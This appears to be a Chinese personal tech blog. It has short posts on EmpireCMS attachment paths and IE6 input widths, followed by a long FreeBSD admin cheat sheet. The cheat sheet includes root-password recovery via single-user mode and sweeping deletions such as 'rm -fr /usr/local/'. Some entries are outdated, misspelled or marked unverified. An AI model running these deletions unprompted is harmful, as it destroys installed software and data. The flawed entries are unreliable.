用帝国CMS建站,我们一般都是在本地电脑做好网站,然后上传到服务器,这样都会出现网站图片附件路径的问题,所以上传到服务器后第一件事在是在后台 -系统设置 – 附件地址,修改一下附件地址。然后再到后台-栏目-其他管理-批量替换字段值,把地址替换一下,替换titlepic和newstext这两个字段
如:本地网站附件地址:/125/d/file/ 替换/d/file/
然后更新数据就OK
2012年12月27日星期四
2012年12月21日星期五
IE6 IE7下文本框和密码框长度不一样
分析了一下原因.其实这是个很简单的问题,因为我在做input的时候,不习惯也不喜欢定义input的宽度,但有时候会忽略去定义input的字体.只要定义一个全局的input字体和字体大小就OK.写下这篇文章,主要也是警惕自己以后要保持定义全局input字体的习惯.
如:input {font-family:Verdana, Arial, Helvetica, sans-serif,”宋体”}
2012年12月18日星期二
FreeBSD常用命令及系统故障处理
01.查看网络流量
a.systat -if 1 (1表示1s刷新屏幕一次)
b.netstat 1
# Traffic 流量 peak 峰值 average 平均值
02.查看硬盘信息
diskinfo -vt /dev/ad0
disklable /dev/ad0 (分区信息)
disklable /dev/ad0s2
03.查看核心信息
vmstat 1
04.查看进程
top
ps -aux
ps -ef |grep xxx
05.查看硬盘详细分区信息&读写状况
gstat
06.sysctl sysctl -a 查看所有变量(/etc/sysctl.conf)
sysctl kern.maxproc 查看特定变量
sysctl kern.maxfiles=5000 设置变量
07.查看磁盘空间使用情形 df 和 du
指令df用来查看整个档案系统的使用情形,
如果您需要知道某个目录的使用情形用指令du。
df -h
du -h /etc
du -sh /etc
-s 参数来省略指定目录下的子目录
-h 表示使用GB、MB等易读的格式
08.断电后系统无法启动
a.启动到sing user模式
b.fsck
c.reboot
09.升级内核后无法启动
a.重启机器到10秒读秒时按enter以外的任意键(新版bsd按6)
b.unload
c.boot kernel.old 或其他可以启动的内核
另外一种方法
a.使用cd1启动,选择Fixit–>CDROM/DVD
b.Fixit#mount /dev/ad0s2a /mnt mount硬盘上的文件系统
c.cd /mnt/boot
d.rm -rf kernel
e.cp -R kernel.old kernel
f.reboot
修改了/boot/loader.conf以后不能正常引导系统了,当机器开始加载
/boot/defaults/loader.conf的时候(未加载完)机器停止响应,我应该怎么办?
a.使用cd1启动,选择Fixit–>CDROM/DVD
b.Fixit#mount /dev/ad0s2a /mnt mount硬盘上的文件系统
c.cd /mnt/boot
d.vi loader.conf 去掉错误的加载项
e.reboot
10.丢失root密码
启动到单用户模式,执行/sbin/mount -a, 然后用passwd更改密码
/sbin/mount -a=挂接/etc/fstab里所有列出的文件系统
如果单用户登录也需要密码
a.使用cd1启动,选择Fixit–>CDROM/DVD
b.Fixit#mount /dev/ad0s2a /mnt mount硬盘上的文件系统
c.cd /mnt/etc
d.vi /ttys 找到when going to single-user mode,更改
console none unknow off insecure为secure
e.reboot,启动到单用户模式/sbin/mount -a,passwd
启动到单用户模式后,ctrl+d进入多用户模式
####让单用户登录也需要密码
a.cd /etc
b.vi /ttys 找到when going to single-user mode,更改
console none unknow off secure为insecure
11.用win2000的引导器启动FreeBSD
装完 freebsd后 系统自动设置如下:
f1 dos
f2 freebsd
先起动到dos下,fdisk /mbr,再把FreeBSD光盘上的boot\boot1复制到c:\,
再编辑c:\boot.ini 加一行c:\boot1=”FreeBsd”
12.硬盘分区时shift+F –>NO可以使用全部空间
13.ctrl+alt+backspace 杀掉xwindows
14.alt+F1…F8 或 printscreensysr循环切换控制台
15.shutdown now 切换到单用户模式
shutdown -p now
shutdown -hp now 关闭电源
shutdown -r now reboot 重新启动机器
shutdown -p +90 (90分钟后关机)
shutdown 0203122359(0203122359表示2002年3月12日23:59,格式是yymmddhhmm)
16.挂载ntfs,fat32分区和u盘
ntfs: mount_ntfs -C eucCN /dev/ad0s5 /mnt/d
fat32:mount_msdos -L zh_CN.eucCN /dev/ad0s6 /mnt/e
u盘(scsi盘): mount_msdos -L zh_CN.eucCN /dev/da0s1 /mnt/u
cdrom: #mount_cd9660 /dev/acd0 /mnt/cdrom
NTFS在FreeBSD中只能读无法写
17.卸载分区
umount /dev/ad0s5
umount -f /dev/ad0s5 (强制卸载)
18.在/etc/fstab中挂载fat32分区
/dev/ad0s5 /mnt/d msdos rw,-L=zh_CN.eucCN 2 2
19.如何在FreeBSD5.X以上加载,卸载ISO文件
mount iso文件:
mdconfig -a -t vnode -f myisofile.iso (屏幕输出md0或者类似的设备名)
mount -t cd9660 /dev/md0 /cdrom
umount:
umount /cdrom
mdconfig -d -u 0 (上面的-u后面的数字和前面的md?中的数字一致)
mdconfig -l 命令可以列出关于配置 md(4) 设备的信息
20.声卡
vi /boot/defaults/loader.conf
更改snd_ich_load=”NO”->”YES” #intel ich
检测声卡 kldstat 或 dmesg |grep pcm
21.ls 命令详解
ls 显示本目录下的文件及目录
ls -a显示本目录下的所有文件及目录(包括隐藏目录和文件)
ls -l 显示本目录下所有文件的属性
ls -l | grep ^d 只显示目录
ls -l | grep ^- 只显示文件
ls -l | grep ^d | wc –l 统计当能目录下的子目录数
ls -l | grep ^- | wc –l 统计当能目录下的文件数
ls -G 以颜色显示目录名和文件名
22.查找程序或文件
which 程序名
whereis 程序名
find 文件名
locate 文件名
locate: database too small: /var/db/locate.database的一种解决方法
a.这个仅仅是因为你开机时间不够长,看看/etc/periodic/weekly/310.locate
b.试试运行/usr/libexec/locate.updatedb看
whatis xxx 要找东西但不知道它是什么
grep bpf /usr/src/sys/i386/conf/GENERIC 在文件中找指定文本
#只能对文本进行grep,如是命令,则
command |grep text
grep text filename
23.xmms乱码问题 (要拷贝simsun.ttf和taboma.ttf到/usr/X11R6/lib/X11/fonts/TrueType/)
在用户目录下建立 .gtkrc.mine 文件.代码如下
style “gtk-default-zh-cn” {
fontset = “-*-tahoma-medium-r-normal-*-12-0-0-0-p-0-iso8859-1,
-misc-simsun-medium-r-normal-*-*-120-*-*-p-*-gbk-0,*-r-*” }
class “GtkWidget” style “gtk-default-zh-cn”
修改xmms中的字体设置,将播放清单及主窗口的字体修改为下面的设置
-*-tahoma-medium-r-normal-*-12-0-0-0-p-0-iso8859-1,
-misc-simsun-medium-r-normal-*-*-120-*-*-p-*-gbk-0,*-r-*
xorg6.9+xfce4+xmms
cd /usr/ports/chineses/xmms make install clean
拷贝simsun.ttf到/usr/X11R6/lib/X11/fonts/TTF/,无需要建立.gtkrc.mine
只要修改xmms中的字体设置,字体simsun,size 12就好了。
24.停止sendmail
vi /etc/rc.conf 加入
sendmail_enable=”NONE”
25.you have mail
mail 回车,输入1看第一封邮件…输入?看帮助
mail 古老的 UNIX 邮件处理程序
如果我们要寄信给非本机的使用者,可以使用的收件人格式如下:
mail -s”hi, my friend” jack@mymail.com
mail -s “hi, my friend” jack@mymail.com < content.txt
执行了 mail 之后,程序会先要求我们输入邮件主旨,输入后就可以开始打本文了。
当完成本文的编辑之后,可以按 Ctrl+D 来将信件送出,或是按二次 Ctrl+C 取消。
26.traceroute &ping的整合工具my traceroute /mtr
/usr/ports/net/mtr
使用: mtr www.163.com
27.使用gnome2的gdm做桌面管理器
vi /etc/rc.conf 加入
gdm_enable=”YES”
vi /root/.dmrc 更改Language=zh_CN.UTF-8–>zh_CN.eucCN
28.远程连接windows终端
rdesktop [-a 16 -f] server’IP[:port]
-a 16表示16位色,-f表示全屏
gui,grdesktop (/usr/ports/net/grdesktop)
29.播放APE格式音乐
/usr/ports/chinese/xmms/ /usr/ports/audio/xmms-mac(ape插件)xmms-wma(wma插件)
30.看图
/usr/ports/graphics/xnview
31.apache22+php5+mysql+postgresql+ZendOptimizer
a,apache22:
cd /usr/ports/www/apache22
make install clean
b,php5:
cd /usr/ports/lang/php5
make install clean
选中APACHE,就可以联编出用于与Apache web服务器配合使用的可动态加载的mod_php5模块.
勿选debug,否则不能装ZendOptimizer
c,php5扩展:
cd /usr/ports/lang/php5-extesions
make install [FORCE_PKG_REGISTER=yes] 强迫安装
make clean
(除预设项目还应选中CTYPE,EXIF,GD,ICONV,IMAP,PCRE,SESSION,ZLIB)
FreeBSD中的PHP支持是高度模块化的,因此基本安装的功能十分有限。增加其他功能非常简单,
只需通过lang/php5-extensions即可完成。这个port提供了一个菜单驱动的界面来帮助完成PHP
扩展的安装。另外也可以通过对应的port来单独安装扩展。例如要将对于MySQL数据库服务器
的支持加入PHP5,只需简单地安装databases/php5-mysql.
d,cp /usr/local/etc/php.ini.recommended /usr/local/etc/php.ini
e,ZendOptimizer
cd /usr/ports/devel/ZendOptimizer
make install clean
f,mysql:
cd /usr/ports/databases/mysql41-server
make WITH_OPENSSL=yes BUILD_OPTIMIZED=yes WITH_CHARSET=gbk WITH_XCHARSET=all SKIP_DNS_CHECK=yes install
./work/mysql-5.0.24/scripts/mysql_install_db
cd /usr/ports/databases/php5-mysql
make install clean
g,postgresql
cd /usr/ports/databases/postgresql81-server
make install clean
/usr/local/etc/rc.d/postgresql initdb
echo ‘postgresql_enable=”YES”‘ >> /etc/rc.conf
cd /usr/ports/databases/php5-pgsql
make install clean
32.怎样刷新环境变量值,而不用退出再登陆?
a,比如要重新设置环境变量ABC的值为abcdef
bash$ export ABC=abcdef
csh% setenv ABC abcdef
b,更新了PATH变量指定目录里可执行命令
rehash
c,更新配置文件
比如你编辑了.cshrc等文件,就需要用source命令
source .cshrc
33.检视软件间的关联
cd /usr/ports/sysutils/pkg_tree
make install clean
之后我们就可以使用 pkg_tree | more 来看各个软件之间的关系了
34.使用 portupgrade 更新软件
cd /usr/ports/sysutils/portupgrade
make install clean
配置文件:/usr/local/etc/pkgtools.conf
如果您只想要升级某一个软件本身,而非所有相依的软件,只要使用
portupgrade “pkgname” 即可。如果您要升级所有和该软件相依的其它软件,
则可以加上参数 -r。如果您要更新包含相依软件的相依软件,则可以使用
参数 -R。另外,您可以使用参数 -m 来要求编译 (make) ports 时多传入
一些参数,还可以使用参数 -f 要求就算版本一样也强制更新。portupgrade
在更新软件时,会保留您原本的设定档。例如,在更新 Apache 时,它会保留
httpd.conf的设定。假设我们更新软件perl-5.8,我们可以用下列指令更新:
# portupgrade -rRf “perl-5.8.*” -m “ENABLE_SUIDPERL=yes”
35.ports安装失败提示
stop in /usr/ports/lang/ruby18/work
删除work目录下所有文件&文件夹再次安装即可.(make clean)
36.ntop–网络监控软件
cd /usr/ports/net/ntop
make install clean
vi /etc/rc.conf 加入
ntop_enable=”YES”
在地址栏中输入http://x.x.x.x:3000 即出来管理界面.
37.修改/etc/rc.conf不重启生效
a.sh /etc/rc
b./etc/netstart
38.freebsd启动的时候停到blanktime的解决办法
可以试试 这个参数:blanktime=”NO”
etc/rc.conf 中把 default_router 注释掉
#未验证!!!
39.Bsd 下的QQ
eva不错,运行速度飞快。
/usr/ports/net-im/eva
gaim-openq
/usr/ports/net-im/gaim-openq
40.一次性把所有安装的ports删除掉
a.pkg_delete -a
以下步骤去掉配置文件,解决一些疑难问题
rm -fr /usr/local/
rm -fr /var/db/ports/
cd /usr/ports && make NOCLEANDEPENDS=yes clean
portsnap fetch update
b.安装pkg_cutleaves它会告诉你,哪些package没有人依赖,并让你决定要不要删除
c.make deinstall与pkg_delete有什麽不同?
简单来说,make deinstall会移除该port,并且不会叁照其相依相关的ports。
pkg_delete在移除该port前,会叁照其相依相关的ports,并且pkg_delete
有支援 wild card,如要移除所有p开头的 ports,则:
cd /var/db/pkg/
pkg_delete p*
要注意的是,如果使用 `make deinstall’,则最好确定系统目前所
安装的版本,与 ports collection 中显示的版本符合,否则有可能会出现非预
期性错误;而pkg_delete是因为直接删除系统中所安装的版本,所以没有此问题。
因此,换句话说,当系统所安装的版本符合ports collections中的版本,则可
以使用make deinstall或pkg_delete,否则的话最好用pkg_delete。
41.pure-ftp安装
cd /usr/ports/ftp/pure-ftpd/
make WITH_LANG=simplified-chinese install clean
[X] BANNER Show pure-ftpd welcome upon session start
cd /usr/local/etc/
cp pure-ftpd.conf.sample pure-ftpd.conf
vi /etc/rc.conf –>加入pureftpd_enable=”YES”
关于pureftpd的编码问题
在win下登陆ftp然后建立中文文件夹,传中文文件然后用FlashFXP登陆看到这些
中文文件和文件夹名字全部是乱码.pure-ftpd.conf中强制用gbk就可以了.
FileSystemCharset gbk
ClientCharset gbk
42.开机自动校准时间
vi /etc/rc.conf—>加入
ntpdate_enable=”YES” # Run ntpdate to sync time on boot (or NO).
ntpdate_flags=”218.75.4.130″ # cn.pool.ntp.org
43.将/usr/ports/distfiles/目录放到/data/disktfiles
cd /usr/ports
mv distfiles /data/distfiles [移动]
ln -s /data/distfiles distfiles [链接][要在/usr/ports目录下做]
ln -s source_file[_dir] target_file[_dir]
44.FreeBSD下面通过串口连接到路由器
使用cu -s speed -l line,就可以连接到COM口或者家猫的线路上,我用的是COM1口,
连接Cisco2924XL,使用cu -s 9600 -l ttyd0,即可连接上交换机配置界面。
45.电子书:CHM、PDF的查看
chmsee,kchmviewer,xpdf,xchm,Acrobat Reader…chmsee对中文支持比较好
/usr/ports/print/acroread7
46.使用axel或者prozilla加速你的port下载
a.axel(据说能搞定文件夹钳套,不错!推荐使用 )
cd /usr/ports/ftp/axel
make install clean
vi /etc/make.conf 加入
FETCH_CMD=axel -a
DISABLE_SIZE=yes
vi /usr/local/etc/axelrc 修改代码
#num_connections = 4
num_connections = 10
4改为10,num_connections前面不留空格,否则出错.
(-a 交互的进步指示器,num_connections = 10 10线程下载)
SIZE参数用来在取得文件之前检查文件的大小.而DISABLE_SIZE则是是否开启这项功能
b.prozilla(速度快,遇到欠套的文件夹会出问题)
cd /port/ftp/prozilla
make install clean
vi /etc/make.conf 加入
FETCH_CMD=proz -s -k=10 -r –no-curses
DISABLE_SIZE=yes
(-s 查找最快的境像,-k=10 10个线程下载,-r 重新开始一个被打断的下载)
c.wget(未测试)
cd /usr/ports/ftp/wget/
make install clean
vi /etc/make.conf 加入
FETCH_CMD=wget -c -t 1
DISABLE_SIZE=yes #这行是必要的
d.在其它机器上fetch
make fetch-recursive (fetch:取得recursive:递归的)
然后将/usr/ports/distfiles拿走。
###make install设置是/etc/make.conf
###pkg_add是在~/.cshrc或~/.profile
e.vi /etc/csh.cshrc
加上以下一行可以在让pkg_add先从更快的站点下载
setenv PACKAGEROOT ftp://ftp.cn.freebsd.org
你可以先设定 PACKAGEROOT,这是用来抓取套件的位置,笔者通常设定
setenv PACKAGEROOT ftp://ftp.tw.freebsd.org
因为这是我认为最稳定的机器,然后就可以透过pkg_add -r 套件名来安装套件,
他会自动的到pub/FreeBSD/ports/i386/packages-4.9-release/Latest/底下
寻找套件,而且你不需要知道版本,只要知道套件名称即可,他会自动安 装
当时的最新版,中文的部分只要加上 zh-,像是 zh-xcin。
你也可以直接指定 PACKAGESITE 来指向特定的位置。像是你希望安装的套件是
最新的,而不是 release 时的版本。
setenv PACKAGESITE ftp://ftp.tw.freebsd.org/pub/Fre … ages-stable/Latest/
f.vi /etc/make.conf
加上以下一行可以在让make先从更快的站点下载ports Distfiles
MASTER_SITE_OVERRIDE?=http://ports.cn.freebsd.org/${DIST_SUBDIR}/
####http://ports.cn.freebsd.org/
Welcome to use FreeBSD Ports Distfiles Mirror.
This mirror is running on China Telecom 100Mbit network.
How to use? Set your /etc/make.conf like this:
MASTER_SITE_OVERRIDE?=http://ports.cn.freebsd.org/${DIST_SUBDIR}/
or like this:
MASTER_SITE_OVERRIDE?=http://ports.hshh.org/${DIST_SUBDIR}/
47.星际译王
辞典程序: /usr/ports/textproc/stardict2/
简体中文辞典:/usr/ports/chinese/stardict2-dict-zh_CN/
48.控制台调音量
mixer
49.How to build openoffice
cd /usr/ports/editors/openoffice.org-2.0
Building/installing/packaging a localized language package (Japanese version for example)
make LOCALIZED_LANG=ja install
去这里ftp://ooopackages.good-day.net/pub/OpenOffice.org/FreeBSD/里面的tbz文件,
可以直接pkg_add
50.OPERA,支持Flash浏览器
cd /usr/ports/www/linux-opera
(注意是www/linux-opera,www/opera是不支持Flash的。)
cd /usr/ports/www/opera
make config
选中[X]SHARED Use a shared Qt library(instead of static)[解决在opera中输入汉字的问题]
make install clean
安装后的美化:
A.Tools->Preference->Advanced->Fonts,把所有的字体都改成Simsun,字体大小设成12。
B.最小字体大小(像素)改为12.[解决一些网站看不清楚的问题]
51.bt客户端
/usr/ports/net-p2p/py-bittorrent 安装完成后执行bittorrent
/usr/ports/net-p2p/rtorrent 功能多,速度快,还完美支持中文编码!
52.emule客户端
/usr/ports/net-p2p/amule2
53.ipguard解决arp攻击
ipguard->Tool designed to protect LAN IP adress space by ARP spoofing
/usr/ports/security/ipguard
make install (不要clean参数,否则无ethers.sample文件)
补充:
A.以/usr/ports/security/ipguard/work/ipguard-0.04/doc/ethers.sample
文件为实例,建立/etc/ethers文件。
B.And then start ipguard:
cd /usr/local/etc/rc.d
mv ipguard.sh.sample ipguard.sh
/usr/local/etc/rc.d/ipguard.sh start
ipguard.sh启动脚本里默认有iface=fxp0,这里应该替换为你做NAT的内网网卡名称。
54.一些安装参数
make fetch 只抓取tarball
make fetch-recursive 抓取安装ports所有须要的其他ports的tarball
make fetch-list 列出port所需的文件
make clean Ports里面make clean,会附带着make clean依赖的软件的
make -DBATCH install不需要用户输入任何东西
make -DINTERACTIVE install 继续上一步
make configure
make distclean,删除不想要的distfiles
55.pkg_info
pkg_info |grep zh-fcitx (查软件版本)
#ls /var/db/pkg也可以查软件版本
pkg_info -L zh-fcitx-3.4 (查看软件安装目录和安装的文件)
pkg_info -xL zh-fcitx (加x了不需要加软件版本号)
pkg_info -r zh-fcitx-3.4 (查看软件依赖情况)
pkg_info -W fcitx (查看fcitx属于哪个软件)
56.Ports如何清除安装参数
cd /usr/ports/www/opera
make distclean移除不是port collections所期望下载的文件
make rmconfig清除用户配置的参数
make showconfig查看当前配置的参数
make config更改参数
57.一款好用的网络性能测试工具iperf
/usr/ports/benchmarks/iperf
58.FreeBSD用户帐户锁定
a.用vipw把他的shell修改成/sbin/nologin就可以了.
b.pw lock useri 解锁用pw unlock userid 59.中文locale
zh_CN.eucCN zh_CN.GBK zh_CN.GB18030 zh_CN.euc zh_CN.UTF-8
#语言代码_国家代码.字符编码
#查看环境变量:locale
#目前还是zh_CN.eucCN(使用GB2312编码)locale最为正式,也最为成熟。
60.本地化设置,以系统默认的csh为例
vi /etc/csh.cshrc 加入
setenv LANG zh_CN.eucCN (语言设为中文)
setenv LC_ALL zh_CN.eucCN (所有本地子集设为中文)
setenv XMODIFIERS @im=fcitx (X下的中文输入法)
set prompt = “%B%m<%/>”(个性化控制台%B颜色%m主机%/目录)
set autolist (自动补齐扩展)
set nobeep (告诉应用程式避免发出哔哔声)
set filec (使档案名称在命令列被完成)
alias ls ls -FG (彩色化ls)61.fcitx小企鹅输入法(有关步骤见60)
/usr/ports/chineses/fcitx
vi /root/.xinitrc 添加
exec fcitx& 到最前一行
62.安装X Server xorg-6.9.0
1.cp freebsddisk1 disk2 PKG to /data/pkg61目录
2.cd /data/pkg61
3.pkg_add xorg-6.9.0.tbz
4.rehash
5.X[Xorg] -configure (生成/root/xorg.conf.new)
6.X[Xorg] -config /root/xorg.conf.new (测试xorg.conf.new配置是否正确)
7.cp /root/xorg.conf.new /etc/x11/xorg.conf
63.安装桌面环境gnome2 and xfce4 and kde3.5.1
gnome2-2.12.3
1.cd /data/pkg61
2.pkg_add gnome2-2.12.3.tbz
3.rehash
4.vi /root/.xinitrc 加入 exec gnome-session
#gnome2提示vi /etc/sysctl.conf,加入
kern.ipc.shmmax=67108864
kern.ipc.shmall=32768
kern.maxfiles=25000
xfce4
1.cd /usr/ports/x11-wm/xfce4
2.make install clean
3.rehash
4.vi /root/.xinitrc 加入 exec xfce4-session
kde-3.5.1
1.cd /data/pkg61
2.pkg_add kde-3.5.1.tbz
3.rehash
4.cd /usr/ports/chineses/kde3-i18n-zh_CN
5.make install clean (kde3汉化)
6.vi /root/.xinitrc 加入 exec startkde
pkg_add -r kde
pkg_add -r zh_CN-kde-i18n
pkg_add -r zh_CN-koffice-i18n
###more /root/.xinitrc
exec fcitx&
exec gnome-session
#exec xfce4-session
#exec startkde
#exec /usr/X11R6/bin/gnome-session
#exec /usr/local/bin/xfce4-session
#exec /usr/local/bin/startkde
64.在Xwindow中使用TrueType字体(simsun宋体,msyh雅黑,tahoma)
1.cp simsun.ttc /usr/X11R6/lib/X11/fonts/TTF/simsun.ttf
2.cp msyh.ttf tahoma.ttf /usr/X11R6/lib/X11/fonts/TTF/
3.cd /usr/X11R6/lib/X11/fonts/TTF
#下面4,5步骤更新字体信息,6重建字体缓存.
4.mkfontscale (生成fonts.scale)否则xorg报错如下:
Could not init font path element/usr/X11R6/lib/X11/fonts/TTF/,removing from list!
5.mkfontdir (生成fonts.dir)否则xorg报错如下:
(WW) `fonts.dir’ not found (or not valid) in “/usr/X11R6/lib/X11/fonts/TTF/”.
Entry deleted from font path.
(Run ‘mkfontdir’ on “/usr/X11R6/lib/X11/fonts/TTF/”.
6.fc-cache -f -v (生成fonts.cache-1)
7.vi /etc/X11/xorg.conf 确认8
8.Load “freetype” (启用支持TrueType字体)
#现在X应用程序已经记住已安装的TrueType字体.
9.在gnome和其他X程序中把字体设置为宋体或雅黑.
65.xlsfonts显示系统中安装的字体
66.FreeBSD中3D加速功能的启用
a.DRI。
这是实现3D功能最重要的部分。DRI是Direct Rendering Infrastructure,
可以简单的把它理解为X和硬件间的接口.但它包含很多独立的模块,负责
从X到硬件的各个环节,包括内核。它最主要的工作就是将Mesa或OpenGL的
函数调用转换为硬件的指令,从而指挥硬件进行渲染等工作。
b.测试你的显卡是不是能实现3D功能,可以采取以下办法:
1.dmesg | grep agp,如果出现:
agp0: <VIA 82C691 (Apollo Pro) host to PCI bridge> mem
0xe0000000-0xe3ffffff at device 0.0 on pci0
的字样,那么你的显卡就有可能实现3D功能.如果什么也没有的话,那么
恭喜你,你再也不用为3D功能而费心了.
2.kldload drm,如果没报错的话,那么你的显卡基本上就可以实现3D功能了。
c.3D功能的确认
运行:glxinfo。在第二行或第三行,如果出现”Direct Rendering: YES“字样,
那就说明已经启用3D加速了。
more /var/log/Xorg.0.log | grep “direct rendering”如果出现下面的字样,
(II) I810(0): direct rendering: Enabled那么你的3D就启用的。如果没有,
那么你要仔细读/var/log/Xorg.0.log。它会在某一行告诉你没启用的原因的。
d.nvidia显卡驱动安装 cd /usr/ports/x11/nvidia-driver/
67.刷新率的问题,
将xorg.conf里的Modes行改成:Modes “1024×768″(小写的X)
选择默认的分辨率和色深。 这是在 “Screen” 小节中定义的:
Section “Screen”
Identifier “Screen0”
Device “Card0”
Monitor “Monitor0”
DefaultDepth 24
SubSection “Display”
Viewport 0 0
Depth 24
Modes “1024×768”
EndSubSection
EndSection
68.make world
cvsup -g -L 2 -h cvsup.freebsdchina.org standard-supfile (升级源码树)
cp /usr/share/examples/etc/make.conf /etc/make.conf
vi /etc/make.conf,保留如下内容
CFLAGS= -O -pipe
COPTFLAGS= -O -pipe
cd /usr/src/sys/i386/conf (更改内核配置文件)
cp GENERIC TDS
vi TDS (按需要修改其内容)
shutdown now (重启到单用户模式)
adjkerntz -i (确定本地时间设置)
cd /usr/src
make -j4 buildworld (编译基本系统)
make buildkernel KERNCONF=TDS (编译新内核)
make installkernel KERNCONF=TDS (安装新内核)
reboot (重新启动)
shutdown now (重启到单用户模式)
cd /usr/src
mergemaster -p (更新/etc目录里的文件,-p预建模式)
make installworld (安装新的二进制)
mergemaster -Ui (更新makeinstallworld不更新的文件,-U进了6-STABLE了,这功能很赞,
就是他会看哪些/etc 的档案,你没有改过的,就会自动 merge,这样子可以省下很多时间跟力气。
shutdown -r now (重新启动)
uname -a (查看系统信息)
cd /usr/src
make cleanworld (清除升级过程产生的临时文件)
#############################################
中断的 build 可以被恢复吗
cd /usr/src
make -DNOCLEAN all
这样就不会取消先前的 make buildworld 所做的工作。
##############################################
如果出现了错误我该怎么办?
删除以往的系统更新树
cd /usr/obj
chflags -R noschg *
rm -rf *
cd /usr/src
make cleandir
make cleandir
不错,make cleandir 真的要执行两次。
然后重新开始整个过程,使用 make buildworld 开始。
mergemaster -p的说明
mergemaster -p的作用是建立一个临时的根环境,把新的配置文件映射到这个环境当中,
然后和系统的配置文件进行比较和处理,目的是保证系统配置文件的更新,这一点很重要!
在执行”mergemaster -p”的过程中,主要是进行以下处理:
检测系统是否存在临时的根环境,如果存在,让用户选择是利用现有的还是删除它,然后新建!
*** The directory specified for the temporary root environment,
/var/tmp/temproot, exists. This can be a security risk if untrusted
users have access to the system.
Use ‘d’ to delete the old /var/tmp/temproot and continue 删除旧的/var/tmp/temproot
Use ‘t’ to select a new temporary root directory 为temproot选择新的目录
Use ‘e’ to exit mergemaster 退出mergemaster
Default is to use /var/tmp/temproot as is
How should I deal with this? [Use the existing /var/tmp/temproot]
一般的处理是选 “d” ,删除原有的目录,系统开始重新建立这个临时的根环境。
只要进行的不是大跨度的 FreeBSD 版本升级,可以简单地跳过这一步.
mergemaster的说明
重新编译整个系统不会使用新的或改过的配置文件更新某些目录(尤其像 /etc,/var和/usr)
更新这些文件最简单的方式就是使用 mergemaster,手工去做也是可以的,只要您愿意。
不管您选择哪一种,一定记得备份/etc 以防出错。
mergemaster操作中可能会遇到以下操作提示:
Use ‘d’ to delete the temporary 删除文件,不更新相应的系统配置文件
Use ‘i’ to install the temporary 安装文件,使用新的配置文件覆盖旧文件
Use ‘m’ to merge the temporary and installed versions 对旧的配置文件进行合并处理,并安装
Use ‘v’ to view the diff results again 察看新文件与旧文件的差异
###跟踪多台机器,以A.B2个机器为例。A要启动nfs_server,B要启动nfs_client
A:/etc/rc.conf
rpcbind_enable=”YES”
nfs_server_enable=”YES”
/etc/exports
/usr/src /usr/obj /usr/ports -maproot=0 192.168.0.61(B-ip)
B:/etc/rc.conf
nfs_client_enable=”YES”
A.cd /usr/src
make -j4 buildworld (编译基本系统)
make buildkernel KERNCONF=TDS (编译新内核)
B。mount b-ip:/usr/src /usr/src
mount b-ip:/usr/obj /usr/obj
cd /usr/src
make installkernel KERNCONF=TDS (安装新内核)
reboot (重新启动)
shutdown now (重启到单用户模式)
cd /usr/src
mergemaster -p (更新/etc目录里的文件,-p预建模式)
make installworld (安装新的二进制)
mergemaster -U (更新makeinstallworld不更新的文件,-U进了6-STABLE了,这功能很赞,
69.freebsd上下的jdk的安装方法(FreeBSD基金会提供的diablo-jdk)
cd /usr/ports/java/diablo-jdk15
最好是通过port的diablo-jdk安装,而不是直接pkg_add,因为后者可能会出现依赖关系不对的问题。
JDK与JRE的关系
JAVA DEVELOPMENT KIT 与JAVA RUNTIME ENVIROMENT之间是什么关系?
JRE只是Java的运行环境,而JDK是Java的开发、运行和调试一体的环境。
JAVA环境变量的设置
csh 就在/etc/csh.cshrc
setenv JAVA_HOME /usr/local/diablo-jdk1.5.0
setenv CLASS_PATH .:/usr/local/diablo-jdk1.5.0/lib/dt.jar
bash就在/etc/profile
export JAVA_HOME=/usr/local/diablo-jdk1.5.0
#export CATALINA_HOME=/usr/local/jakarta-tomcat5
export CLASSPATH=.JAVA_HOME/jre/lib/rt.jarJAVA_HOME/lib/dt.jarJAVA_HOME/lib/tools.jar
70.查找最快的cvsup站点
cd /usr/ports/sysutils/fastest-cvsup
make install clean
fastest-cvsup -c jp,cn,hk,us
71.chmod 命令概解:chmod命令用于改变文件的运行级别(读=4写=2执行=1)
chmod 400 files 给某文件以只读权限
chmod 600 files 给某文件以只读、写权限
chmod 700 files 给某文件以只读、写、执行权限
chmod -R 400 directory 改变某目录下所有文件的运行权限为只读权限
chmod -R 600 directory 改变某目录下所有文件的运行权限为以只读、写权限
chmod -R 700 directory 改变某目录下所有文件的运行权限为只读、写、执行权限
72.chown概解:改变文件及文件夹的用户所属
chown root:wheel files 改变文件的用户为root用户组为wheel组
chown -R root:wheel directory 改变目录的用户为root用户组为wheel组
73.crontab 指令语法
crontab [ -u user ] file
crontab [ -u user ] { -l | -r | -e }
crontab 提供我们在固定的间隔时间执行自订的程序、系统指令或 shell secrip。时间间隔的单位可以是分钟、
小时、日、周、月及以上的任意组合。允许使用者离线执行,并且可以将执行结果以 email 通知使用者。因此,
非常设合对周期性的管理分析或数据备份等工作。
基本上,crontab 的指令格式分为六个部分,前五个为时间间隔,最后则是执行的指令。每一个部分用空格来区隔。
crontab -e : 执行文字编辑器来设定时程表,内定的文字编辑器是 VI,如果你想用别的文字编辑器,则请先设定
VISUAL 环境变数来指定使用那个文字编辑器(比如说 setenv VISUAL joe)
crontab -r : 删除目前的时程表
crontab -l : 列出目前的时程表
crontab file [-u user]-用指定的文件替代目前的crontab。
时程表的格式如下:
f1 f2 f3 f4 f5 program
分 时 天 月 星期几 要执行的程序
当 f1 为 * 时表示每分钟都要执行 program,f2 为 * 时表示每小时都要执行程序,其馀类推
当 f1 为 a-b 时表示从第 a 分钟到第 b 分钟这段时间内要执行,f2 为 a-b 时表示从第 a 到第 b 小时都要执行,其馀类推
当 f1 为 */n 时表示每 n 分钟个时间间隔执行一次,f2 为 */n 表示每 n 小时个时间间隔执行一次,其馀类推
当 f1 为 a, b, c,… 时表示第 a, b, c,… 分钟要执行,f2 为 a, b, c,… 时表示第 a, b, c…个小时要执行,其馀类推
使用者也可以将所有的设定先存放在档案 file 中,用 crontab file 的方式来设定时程表。
先前曾提到,crontab 的格式分成六个部分,前五个是时间参数。在上例中你会发现除了数字与英文名称,
有使用到符号”*”,这个符号代表每一单位的意思,譬如30 3 * * *既代表30分3点每日每月星期的每天。
时间的指定,可以是单一的数字,或几个数字用逗号来连接。看下例
30 3,12 * * * /root/fbin/bak-web
其中的第二项为 3,12,这代表 3 以及 12 小时的意思。再来看下例
30 */6 * * * /root/fbin/bak-web
我把第二项改成 */6 这代表每 6 小时,也相当于 6,12,18,24 的作用。此外还有一个区段的做法
30 8-18/2 * * * /root/fbin/bak-web
